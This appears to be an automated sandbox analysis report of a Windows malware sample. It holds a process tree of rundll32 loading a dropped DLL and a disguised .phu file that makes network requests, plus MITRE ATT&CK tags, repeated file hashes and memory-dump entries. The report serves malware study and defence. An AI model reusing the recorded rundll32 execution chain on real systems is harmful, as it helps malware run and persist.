  PID:1544
- - C:\Windows\system32\rundll32.exe
    "C:\Windows\system32\rundll32.exe" C:\Users\Admin\M64pcdm\Qjabqbm\E09O.dll AnyString
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1496
  - - C:\Windows\SysWOW64\rundll32.exe
      "C:\Windows\system32\rundll32.exe" C:\Users\Admin\M64pcdm\Qjabqbm\E09O.dll AnyString
      4⤵
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:1380
    - - C:\Windows\SysWOW64\rundll32.exe
        
        C:\Windows\SysWOW64\rundll32.exe "C:\Users\Admin\M64pcdm\Qjabqbm\E09O.dll",#1
        5⤵
        Loads dropped DLL
        Drops file in System32 directory
        Suspicious use of WriteProcessMemory
        
        PID:1028
      - C:\Windows\SysWOW64\rundll32.exe
        
        C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Zplopiuapfzhl\lkscxpzmtrqw.phu",uOuMwHUeYPx
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:544
        
        C:\Windows\SysWOW64\rundll32.exe
        
        C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Zplopiuapfzhl\lkscxpzmtrqw.phu",#1
        7⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        
        PID:1388

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\M64pcdm\Qjabqbm\E09O.dll

MD5
e0de89388727ac2d5a0ea9c26ca7e201

SHA1
4084627f88cd2230eb50ce504dd806bfc94ab67c

SHA256
594dee86047502872d6c9322b3d79ae58f85b878597fbaac76fb60f997df40b5

SHA512
1d6407d0b5a45e81ceccbe1cc48e0bc8bba53d801d0df70324a94fc56fe36ab69bb2cd2180afea92ff54d7ea350c396bcdd09c478bf6fe8ce67f6d1d8a391005

Download Submit
\Users\Admin\M64pcdm\Qjabqbm\E09O.dll

MD5
e0de89388727ac2d5a0ea9c26ca7e201

SHA1
4084627f88cd2230eb50ce504dd806bfc94ab67c

SHA256
594dee86047502872d6c9322b3d79ae58f85b878597fbaac76fb60f997df40b5

SHA512
1d6407d0b5a45e81ceccbe1cc48e0bc8bba53d801d0df70324a94fc56fe36ab69bb2cd2180afea92ff54d7ea350c396bcdd09c478bf6fe8ce67f6d1d8a391005

Download Submit
\Users\Admin\M64pcdm\Qjabqbm\E09O.dll

MD5
e0de89388727ac2d5a0ea9c26ca7e201

SHA1
4084627f88cd2230eb50ce504dd806bfc94ab67c

SHA256
594dee86047502872d6c9322b3d79ae58f85b878597fbaac76fb60f997df40b5

SHA512
1d6407d0b5a45e81ceccbe1cc48e0bc8bba53d801d0df70324a94fc56fe36ab69bb2cd2180afea92ff54d7ea350c396bcdd09c478bf6fe8ce67f6d1d8a391005

Download Submit
\Users\Admin\M64pcdm\Qjabqbm\E09O.dll

MD5
e0de89388727ac2d5a0ea9c26ca7e201

SHA1
4084627f88cd2230eb50ce504dd806bfc94ab67c

SHA256
594dee86047502872d6c9322b3d79ae58f85b878597fbaac76fb60f997df40b5

SHA512
1d6407d0b5a45e81ceccbe1cc48e0bc8bba53d801d0df70324a94fc56fe36ab69bb2cd2180afea92ff54d7ea350c396bcdd09c478bf6fe8ce67f6d1d8a391005

Download Submit
\Users\Admin\M64pcdm\Qjabqbm\E09O.dll

MD5
e0de89388727ac2d5a0ea9c26ca7e201

SHA1
4084627f88cd2230eb50ce504dd806bfc94ab67c

SHA256
594dee86047502872d6c9322b3d79ae58f85b878597fbaac76fb60f997df40b5

SHA512
1d6407d0b5a45e81ceccbe1cc48e0bc8bba53d801d0df70324a94fc56fe36ab69bb2cd2180afea92ff54d7ea350c396bcdd09c478bf6fe8ce67f6d1d8a391005

Download Submit
\Users\Admin\M64pcdm\Qjabqbm\E09O.dll

MD5
e0de89388727ac2d5a0ea9c26ca7e201

SHA1
4084627f88cd2230eb50ce504dd806bfc94ab67c

SHA256
594dee86047502872d6c9322b3d79ae58f85b878597fbaac76fb60f997df40b5

SHA512
1d6407d0b5a45e81ceccbe1cc48e0bc8bba53d801d0df70324a94fc56fe36ab69bb2cd2180afea92ff54d7ea350c396bcdd09c478bf6fe8ce67f6d1d8a391005

Download Submit
\Users\Admin\M64pcdm\Qjabqbm\E09O.dll

MD5
e0de89388727ac2d5a0ea9c26ca7e201

SHA1
4084627f88cd2230eb50ce504dd806bfc94ab67c

SHA256
594dee86047502872d6c9322b3d79ae58f85b878597fbaac76fb60f997df40b5

SHA512
1d6407d0b5a45e81ceccbe1cc48e0bc8bba53d801d0df70324a94fc56fe36ab69bb2cd2180afea92ff54d7ea350c396bcdd09c478bf6fe8ce67f6d1d8a391005

Download Submit
\Users\Admin\M64pcdm\Qjabqbm\E09O.dll

MD5
e0de89388727ac2d5a0ea9c26ca7e201

SHA1
4084627f88cd2230eb50ce504dd806bfc94ab67c

SHA256
594dee86047502872d6c9322b3d79ae58f85b878597fbaac76fb60f997df40b5

SHA512
1d6407d0b5a45e81ceccbe1cc48e0bc8bba53d801d0df70324a94fc56fe36ab69bb2cd2180afea92ff54d7ea350c396bcdd09c478bf6fe8ce67f6d1d8a391005

Download Submit
\Users\Admin\M64pcdm\Qjabqbm\E09O.dll

MD5
e0de89388727ac2d5a0ea9c26ca7e201

SHA1
4084627f88cd2230eb50ce504dd806bfc94ab67c

SHA256
594dee86047502872d6c9322b3d79ae58f85b878597fbaac76fb60f997df40b5

SHA512
1d6407d0b5a45e81ceccbe1cc48e0bc8bba53d801d0df70324a94fc56fe36ab69bb2cd2180afea92ff54d7ea350c396bcdd09c478bf6fe8ce67f6d1d8a391005

Download Submit
memory/544-40-0x00000000006D1000-0x0000000000734000-memory.dmp

Filesize
396KB

Download
memory/544-35-0x0000000000000000-mapping.dmp

Download
memory/608-5-0x0000000000000000-mapping.dmp

Download
memory/1028-25-0x0000000000000000-mapping.dmp

Download
memory/1028-34-0x0000000000701000-0x0000000000764000-memory.dmp

Filesize
396KB

Download
memory/1380-32-0x00000000002A1000-0x0000000000304000-memory.dmp

Filesize
396KB

Download
memory/1380-19-0x0000000000000000-mapping.dmp

Download
memory/1380-20-0x00000000760B1000-0x00000000760B3000-memory.dmp

Filesize
8KB

Download
memory/1380-31-0x0000000000210000-0x0000000000236000-memory.dmp

Filesize
152KB

Download
memory/1388-37-0x0000000000000000-mapping.dmp

Download
memory/1496-17-0x0000000000000000-mapping.dmp

Download
memory/1544-11-0x0000000002430000-0x0000000002431000-memory.dmp

Filesize
4KB

Download
memory/1544-16-0x000000001B780000-0x000000001B781000-memory.dmp

Filesize
4KB

Download
memory/1544-9-0x0000000002350000-0x0000000002351000-memory.dmp

Filesize
4KB

Download
memory/1544-8-0x000007FEF5150000-0x000007FEF5B3C000-memory.dmp

Filesize
9.9MB

Download
memory/1544-15-0x000000001AB70000-0x000000001AB71000-memory.dmp

Filesize
4KB

Download
memory/1544-12-0x000000001AE50000-0x000000001AE52000-memory.dmp

Filesize
8KB

Download
memory/1544-13-0x000000001AE54000-0x000000001AE56000-memory.dmp

Filesize
8KB

Download
memory/1544-14-0x00000000024F0000-0x00000000024F1000-memory.dmp

Filesize
4KB

Download
memory/1544-6-0x0000000000000000-mapping.dmp

Download
memory/1544-7-0x000007FEFBA01000-0x000007FEFBA03000-memory.dmp

Filesize
8KB

Download
memory/1544-10-0x000000001AED0000-0x000000001AED1000-memory.dmp

Filesize
4KB

Download
memory/1676-43-0x000007FEF7810000-0x000007FEF7A8A000-memory.dmp

Filesize
2.5MB

Download
memory/1864-4-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1864-2-0x0000000072501000-0x0000000072504000-memory.dmp

Filesize
12KB

Download
memory/1864-3-0x000000006FF81000-0x000000006FF83000-memory.dmp

Filesize
8KB

Download